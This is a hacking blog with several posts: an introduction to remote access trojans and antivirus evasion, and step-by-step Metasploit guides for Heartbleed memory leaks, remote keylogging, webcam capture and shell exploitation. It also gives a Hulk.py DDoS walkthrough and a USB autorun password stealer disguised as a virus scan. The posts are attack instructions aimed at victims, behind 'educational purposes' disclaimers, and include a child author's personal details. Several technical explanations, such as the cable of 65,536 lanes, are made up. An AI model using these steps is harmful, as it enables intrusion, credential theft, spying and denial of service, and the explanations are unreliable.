Thursday, 2 April 2015

New Site

             Cyber Tools United-New Site Coming Soon

Our New Site Releasing Soon Cybertoolsunited.blogspot.com

Monday, 30 March 2015

Understanding R A Ts

                                 Cyber Tools United-Understanding R A Ts

Here is an introduction to Remote administration tools. These are generally called RATs, and yes they have a vicious bite. although this page doesn’t teach you how to blast open a RAT straight away, here you will learn everything you will need to start a ‘plague’. RATs form an entire class of hacking including trojan infections, backdoors etc. But to go further, we need to clear up the basics first so, here we go.
What’s a RAT?
RAT = Remote Administration Tool. It is mostly used for malicious purposes, such as controlling remote PC’s, stealing victims data, deleting or editing some files. One can infect someone else by sending them a file called “Server”. If and when this server file is opened, it burrows itself deep in the system and starts to run in the background. Further, it may also send the attacker a message every time it is active like when a computer is turned on.
How are they spread?
Some RATs can spread over P2P (peer to peer) file sharing services (Torrents, mostly..), messenger and email spams(MSN, Skype, AIM etc.) while other may tag along hiding behind some other software. The user installs something, clicks “Next” 5 times and voila! Without anyone ever finding out the RAT has compromised a system.
How is the server controlled?
Once installed, the RAT server can be controlled via what’s called a RAT client. Basically it’s just an application that tracks your RAT’s movements. It tells you how many systems are infected, information on their system, versions of OS and other softwares, their IP address etc. It shows a whole list of IP addresses which may be connected to immediately. After connecting, you can make the computer do pretty much anything (except maybe, do hula dance XD) – Send a keylogger, uninstall their antivirus, crash the system etc.
What is port forwarding?
If you’re a gamer or are used to downloading torrents, you must’ve heard “Port Forwarding” as a way to increase download speeds, reduce lag etc. Port forwarding is the redirecting of computer signals to follow specific electronic paths into your computer.If the computer signal can find its way into your computer a few milliseconds quicker, it will add up to be a possibly dramatic speed increase for your game or your downloading. Don’t start jumping around just yet, your internet connection is probably already optimized for maximum performance (It is so, by default).
Let’s take an example: That pencil-thin network cable (that goes into the network adapter) at the back of your computer contains 65,536 microscopic pathways inside it. Your network cable is just like a major highway, except your network cable has freaking 65,536 lanes, and there is a tollboth on each lane. We call each lane a ‘port’.(FYI, 2^16 = 65,536. So, that tells us 2 bytes = 16 bits in all is sort of the “width” of network cables, which gives us 65,536 different possible combinations – hence the same number of ports.)
Your internet signal is comprised of millions of tiny little cars that travel on these 65,536 lanes. We call these little cars “transfer packets”. Computer transfer packets can travel very quickly (just under the speed of light actually), but they do observe a stop-and-go set of rules, where they are required to stop at each major network intersection as if it were a border crossing between countries, or connecting to a different ISP. At each intersection, the packet must do three things:
►Find an open port,
►Pass the identification test that will allow it through that port, and if not,
►Move to the next port and try again, until it is allowed to pass through the toll.
In some cases, packets sent by hackers will be caught and held at the intersection, where they will then be dissolved into random electrons. When this happens, it is called “packet filtering” or “packet sniping”. Likewise, if a hacker gains control of a much used port, he can control every bit of information that passes through it – Read it, modify or even delete.
All in all, Port forwarding is when you command your network router to proactively identify and redirect every packet to travel on specific electronic lanes. Instead of having every packet stop at each port in turn until it finds an open port, a router can be programmed to expedite the process by identifying and redirecting packets without having them stop at each port. Your router then acts like a type of hyper-fast traffic policeman who directs traffic in front of the tollbooths.
Can an antivirus catch a RAT?
Yes. Actually, Hell Yes! As a hacker, you will find antiviruses blocking your path at every damn step. (But we are white hats, right? No matter how annoying, it’s there to protect us, so be happy). But, like every problem, this too has a solution – Encryption. It’s called making your server “FUD” – Fully Undetectable. For example, typical encrypted formats, say password protected .zip or .rar files (if they contain malicious softwares) can be caught by an AntiVirus. Making a program FUD does pretty much the same thing, except it does so like a drunkard with OCD (Obsessive-compulsive disorder). What I mean is, running the software through an encryption program again and again so that nothing can recognize what it is and it can pass off as random harmless noise. Something called “Hex Editing” is a well known way to go about doing this. This is a whole different topic in itself. So, more on this later.
Legal or illegal?
Well, some RATs are legal, and some are not. Legal are the ones without a backdoor, and they have abillity to close connection anytime.(Backdoor is something that gives the attacker access to the victim’s system without their knowledge). Plus these are not really referred to as RAT’s, that’s just our (hacker’s) dirty language :-) Illegal ones are used for hacking and they may possibly steal data (or worse).
A few examples are written below:
Legal:
►TeamViewer – Access any remote computer via Internet just like sitting in front of it – even through firewalls.
►UltraVNC – Remote support software for on demand remote computer support.
►Ammyy Admin – Like TeamViewer, Ammyy Admin is another reliable and friendly tool for remote computer access.
►Mikogo – Mikogo is an Online Meeting, Web Conferencing, Remote Support tool where you can share your screen with several participants in real-time over the Web.
The above tools while very useful and very legal, require a green light from both the parties involved. That’s the main difference between the ones above and the ones below:
Illegal (or barely legal):
►Spy-Net
►Cerberus Rat
►CyberGate Rat
►SubSeven
►Turkojan
►ProRat
These are all used for one purposes – Causing trouble, to say the least. RATs like the ones above are meant to be stealthily. After all, no hacker will want their victims to get a message like: “Congratulations! You have been infected!”(Or maybe let the AntiVirus find it). Use any of these on an actual victim, and you will get a ticket to jail, or at least a fine. But these are actually used, and mostly without anyone ever suspecting anything wrong. The thing is, hacking is becoming much more of a serious business than a game. A RAT that simply crashes the OS or formats the hard disk gives nothing to the attacker, So why bother doing it in the first place ? RATs today are evolving (pun unintended). They are becoming more like “parasites” instead of predators.
They may be used for DDOSing (by creating massive botnets with tens of thousands of slave computers), clicking ads in the background(the usual click fraud), increasing blog and youtube “views”, even using the compromised systems to “earn money online”, by pushing surveys, exploiting the websites which offer a pay-per-install model, even “mining” bitcoins (Bitcoins are just a fancy new online currency. Bitcoins can be earned by devoting CPU power, then converted into real money, hence their potential exploitation by using RATs). (Don’t bother googling this. Like every “Online money making” offer, whether it works or not, this too is a waste of your time. No offence to the BitCoin Foundation :-D)
Whats DNS host?
The Domain Name System (DNS) is a hierarchical naming system for computers, services, or any resource connected to the Internet or a private network. It associates various information with domain names assigned to each of the participants. Most importantly, it translates domain names meaningful to humans into the numerical (binary) identifiers associated with networking equipment for the purpose of locating and addressing these devices worldwide.
What all can a RAT do?
Here is list of basic features:
• Manage files. (Delete/Modify)
• Control web browser(Change homepage, open a website etc.)
• Get system informations(OS Version, AV name, RAM Memory, Computer name, Network Addresses etc.)
• Get passwords, CC numbers or private data etc. (via Keylogger)
• View and control remote desktop (Take screenshot or a snap from the webcam)
• Record camera, sound (Control mic and camera)
• Control mouse, keyboard input.
• Pretty much everything you can do on your own computer, except play GTA V remotely. (Although technically, you can do that too)

Sunday, 29 March 2015

Heart Bleed Bug

                         Cyber Tools United-Heart Bleed Bug

First Of All Download Kali Linux From The Official Link Below-
Kali.org
 Step 1: This might be a good time to update metasploit to get the new auxiliary module for Heartbleed (Unless you downloaded metasploit after the exploit was released). Type:
kali > msfupdate
Metasploit will then go through the long and slow process of checking and updating its modules and framework. On being returned to the command prompt, the update has completed and we’re ready to begin.
Step 2: Start Metasploit
kali > msfconsole
Step 3: Find Heartbleed using the built in search feature. Type:
search heartbleed
This should bring up two auxiliary modules for Heartbleed. We want the one under ‘scanner’ folder and not ‘server’.
Step 4: Load up the auxiliary module
use auxiliary/scanner/ssl/openssl_heartbleed
This will load the heartbleed module.
Whenever using a new module, you may wish to find more about it and the options we can set for it.
msf > info
This command reveals the options that we can set in order to use this module and a description of the module.
Step 5: Set RHOSTS. RHOSTS refers to the website that is vulnerable to the Heartbleed bug. We can set it to the IP address of the website as shown below (To find the IP address of a website, simply ping it through the command line (e.g : ping www.google.com) :
msf > set RHOSTS 192.168.1.169
msf > set verbose true
Finally, set the option ‘verbose” to “true”. This will provide us with verbose output (i.e., everything that metasploit receives from the server will be shown to us).
Step 6: Let her rip.
msf > run
If everything went as planned the server will leak about 64K bytes of what was in its memory. This could contain anything from username-password pairs to credit card numbers which is why this hack (along with pretty much all others) is very much illegal to actually try on a live website without the developer’s explicit consent.
 <<<<<<Only For Educational Purposes I am Not Responsible Of Any Promblem Readers Do with This Information>>>>>>>
My Facebook Account<<<facebook.com/nabeel.ahmad.56679015>>>>
For Help Contact Me At^^^^^^^^^^^^^^^^^^^^
I am A Samll Child Who Want To Gain Information
My Age=11
My Name=Nabeel Ahmad 
My Group = https://www.facebook.com/groups/CyberOfficialTools/

Cyber Tools United-Because Every Good Thing Is Bad

Remote Metasploit Keylogger

Cyber Tools United-Metasploit Keylogger

Because the keylogger is mightier than the sword
In this tutorial, we’ll attempt to remotely install a keylogger. This one is actually quite basic, so without further ado, let’s begin.
Fire up Metasploit and let’s get started. Like before, we’re assuming that the system has already been broken into and we have the meterpreter session.
Step 1: Find a program.
The way the keylogger in Meterpreter works is, you have to attach it to a running program. Say for example, we find that the victim’s computer is running an internet browser, a game and MS Word. Clearly there’s two items of interest in there. We can attach the keylogger to the browser or MS Word to get whatever’s being typed in these two applications. So, first we check what all processes are running on the target system using the following command:
meterpreter >ps
Usually you’ll get a very long list of items. The two columns we’re interested in are PID (Process ID) and process name. For this step you may want to google up the names of some processes to see which programs they belong to or if you find the ones you know of, like chrome.exe (Google Chrome) or notepad.exe then you can use these. We need to migrate meterpreter to the corresponding PID. Suppose we found wordpad.exe at PID=1440
meterpreter > migrate 1440
You should see a message “Migration completed successfully”.
Step 2: Start the Keylogger
Now we can embed the keylogger into the program.The Meterpreter keylogger is a built-in feature called keyscan. We can start it up by the following command:
meterpreter> keyscan_start
This should successfully attach the keylogger to our preferred program and the keylogging will start immediately.
Step 3: Dump the logged Keystrokes
So, in the previous step we hooked up a keylogger to the WordPad application running on our victim’s computer. It’ll keep running until we tell it to stop (or the victim shuts down the computer). We can recover whatever the keylogger has logged by the following command. You might want to wait a while, maybe grab a snack while the keylogger is running on the system just to give it enough time to log something. It’s pretty much hit and trial since we don’t know when the victim is going to choose the application we’re keylogging and type something in it. They could be typing in it just as we hooked up the keylogger or they may not use the application for hours.
meterpreter> keyscan_dump
If all went great and the victim actually typed something in our chosen application meterpreter will print out everything in our command shell. You could try using different applications to get different results. Obviously you’ll not get anyone’s passwords by keylogging WordPad whereas chrome.exe and firefox.exe are much more likely to give us something of more interest.
 <<<<<<Only For Educational Purposes I am Not Responsible Of Any Promblem Readers Do with This Information>>>>>>>
My Facebook Account<<<facebook.com/nabeel.ahmad.56679015>>>>
For Help Contact Me At^^^^^^^^^^^^^^^^^^^^
I am A Samll Child Who Want To Gain Information
My Age=11
My Name=Nabeel Ahmad 
My Group = https://www.facebook.com/groups/CyberOfficialTools/

Cyber Tools United-Because Every Good Thing Is Bad

Hacking Webcam

               Cyber Tools United-Hacking Your Network's Webcam

In This Post I Will Teach You How To Hack Webcams That Are On Your Network.First Of All Install
Metasploit from the link Below
www.metasploit.com
Have You Ever Wondered That Hacking Webcams Might Be So Easy.In This Small Post I will Teach You How.
Its Done When You Have Install Metasploit 
Open Metasploit 
Write
Set PAYLOADwindows/meterpreter/reverse_tcp
Meterpreter-webcam list (If Nothing Appears Then Your Victim Might Not Have A Webcam)
meterpreter-webcam_snap
meterpreter >run webcam -p /var/w.w.w.
 <<<<<<Only For Educational Purposes I am Not Responsible Of Any Promblem Readers Do with This Information>>>>>>>
My Facebook Account<<<facebook.com/nabeel.ahmad.56679015>>>>
For Help Contact Me At^^^^^^^^^^^^^^^^^^^^
I am A Samll Child Who Want To Gain Information
My Age=11
My Name=Nabeel Ahmad 
My Group = https://www.facebook.com/groups/CyberOfficialTools/

Cyber Tools United-Because Every Good Thing Is Bad

Messing Up With Metasploit

                       Cyber Tools United-Mess With Metasploit

In This I Will Not Come Onto The Topic As It Very Small Codes.  You Need To Install The Application Given Below-
www.metasploit.com
The Codes Are Very Simple But I Will Make You Understand Evry Bit Of The Things-
Use exploitname-It Tells The Metasploit To Exploit With The Specified Name


set RHOST hostname_or_ip-
Will instruct The Metasploit To Target The Specified Remote Host

set RPORT host_port
Set The Port That Metasploit Will Connect To On The Remote Host

set PAYLOAD generic/shell_bind_tcp
As An Example,This Command sets The payload To a generic one that will give you access To Shell When A Service Is Exploited
Now The Main Commands To Capture And Mess With Other Computers
set RHOST (anyipaddress) (Without simicoluoms)
set RPORT 3000 (anyport in place of 3000)
set PAYLOAD generic/shell_bind_tcp
set LPORT 9485
exploit
<<<<<<Only For Educational Purposes I am Not Responsible Of Any Promblem Readers Do with This Information>>>>>>>
My Facebook Account<<<facebook.com/nabeel.ahmad.56679015>>>>
For Help Contact Me At^^^^^^^^^^^^^^^^^^^^
I am A Samll Child Who Want To Gain Information
My Age=11
My Name=Nabeel Ahmad 
My Group = https://www.facebook.com/groups/CyberOfficialTools/

Cyber Tools United-Because Every Good Thing Is Bad

Saturday, 28 March 2015

DDOS ATTACK

                  Cyber Tools United-Launching A Powerful DOS

Without Wasting time I Will Be On The Topic.In This Post I Will Teach You How To Make A powerfull DDOS  Attack Like A Pro.A Few Tools Will Be Required.That Are Listed Below-
Phython Engine(Ver.2.X)
Hulk.py Script
For Technical Details Official Site Is-www.sectorix.com/2012/05/17/hulk-web-dos-tool/
When All Is Done You Should Have Phython installed And Hulk Script File Extracted.It Would Be Easier If You Install Phython script To A Root Directory.For Example:
C://Phython27
Also Put The Hulk Extracted File Over Their.
With All Done Let's Start Our DDOS.
Open Cmd To Start  cmd.exe Window
Change directory where You Installed Phython And Put Hulk.py,Type 'cd' then the Directory(Case Sensitive) (cd=Change Directory)
cd C://phython27
Now Start Up The Hulk.py Script As Follows
C://hulk.py http://www.Google.com
You Should See Something Like Hulk Attack Started
Wait a Few Seconds And When The Attack Is Succesfull You Should See Something Like 'Response Code 500'
And As Soon You Get It Try To Open The Site Again And You Will See Written Something Like Resource Amount Limit Reached
Most Service Totally Deny Your Request And The Website Is Down Just For You Or Website Banned You.
<<<<<<Only For Educational Purposes I am Not Responsible Of Any Promblem Readers Do with This Information>>>>>>>
My Facebook Account<<<facebook.com/nabeel.ahmad.56679015>>>>
For Help Contact Me At^^^^^^^^^^^^^^^^^^^^
I am A Samll Child Who Want To Gain Information
My Age=11
My Name=Nabeel Ahmad 
My Group = https://www.facebook.com/groups/CyberOfficialTools/

Cyber Tools United-Because Every Good Thing Is Bad


Keyloggers

                         Cyber Tools United-Keyloggers

Welcome Friends Without wasting Time Just Get On The Point.In This Tutorial I will Teach You How To Make A Usb Password Stealer Keylogger. The Tools You Required Are Listed Below-
PSPV<<<<<<<<<<http://www.nirsoft.net/utils/pspv.html>>>>>>>>
Now Start The Method Of Exploiting Password-
Now Download The 5 Tools In Your USB.
All Are .EXE Files.
Create A New Notepad.
[autorun] open=launch.bat
Action=Perform a Virus Scan
Save The Notepad and rename it From New Text Document.txt To autorun.inf
Now Copy The Autorun.inf File onto Your USB Pendrive
Create another Notepad  and write the following text Onto It.(No Copy And Paste Allowed.As If So It Will Not Work)
start mspass.exe/stext mspass.txt
start mailpv.exe/stext mailpv.txt
start iepv.exe/stext iepv.txt
start pspv.exe/stext pspv.txt
start passwordfox.exe/stext passwordfox.txt
Save Notepad And Rename it From New Text Document.txt To launch.bat
Copy the launch.bat File Also To The USB
Now Hookup Lauch.bat And autorun.inf An Its Ready As Soon As Pendrive Insert First It Will Perform A Pop Up Window Will Appear And Choose Virus Scan And Its It.The Programm Will start Automatically
<<<<<<Only For Educational Purposes I am Not Responsible Of Any Promblem Readers Do with This Information>>>>>>>
My Facebook Account<<<facebook.com/nabeel.ahmad.56679015>>>>
For Making A Keylogger Contact Me At^^^^^^^^^^^^^^^^^^^^
I am A Samll Child Who Want To Gain Information
My Age=11
My Name=Nabeel Ahmad 
My Group = https://www.facebook.com/groups/CyberOfficialTools/

Cyber Tools United-Because Every Good Thing Is Bad